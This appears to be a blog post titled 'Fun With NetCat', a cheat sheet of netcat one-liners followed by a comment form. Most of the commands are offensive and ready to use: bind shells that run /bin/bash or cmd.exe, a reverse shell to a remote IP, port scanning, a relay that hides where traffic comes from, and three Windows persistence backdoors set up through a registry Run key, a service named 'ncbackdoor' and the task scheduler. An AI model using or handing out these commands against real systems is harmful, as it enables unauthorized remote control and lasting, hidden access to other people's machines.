Fun With NetCat

NetCat is known as the TCP/IP Swiss-army knife.  It allows one to write data across a TCP or UDP connection.  It is available for most Unix/Linux operating systems as well as Windows.

Here are some fun things you can do with NetCat:

Execute shell on client connection:
nc –l –p 12345 –e /bin/bash (Unix/Linux)
nc –l –p 12345 –e cmd.exe (Windows)
nc –l –p 12345 –e cmd.exe -L – reopens connection after client closes connections (windows only)

Reverse shell:
nc -l -p 12345
nc <server ip> 12345 -e /bin/bash

Zero i/o mode(port scanning) (-z):
nc -z -v 1-65535

Redirect received info to file:
nc –l –p 12345 > dumpfile

Redirect input to file. When client connects, it will receive file:

nc –l –p 12345 < dumpfile
Client connects to server. dumpfile is transfer from server and outputted to client.
nc 12345 > dumpfile

Redirect ports and traffic (Relay):
nc –l –p 12345 | nc <hostname of target> 54321

Client connects to server on port 12345 but the target sees traffic coming from the server on
port 54321.

Configure backdoor to run everytime windows user logs in (domain priviledges):
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
“c:\windows\nc.exe -d 1234 -e cmd.exe”

Executing backdoor using a windows service(only local system shell):
sc create ncbackdoor binPath= “cmd /K start c:\nc.exe –d 1234 –e cmd.exe” start= auto error= ignore

net start ncbackdoor

Executing backdoor using windows task scheduler (only local system shell):
C:\>at 15:00:00 /every:m,t,w,th,f,s,su ““c:\nc.exe -d 1234 -e cmd.exe””

Unzip/un-tar file over network:
dd if=some.file.tar.gz | nc <destination ip> 12345 -vvv

destination (tar must be run with the “-“):
nc -l -p 12345 -vv | tar xzf –


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s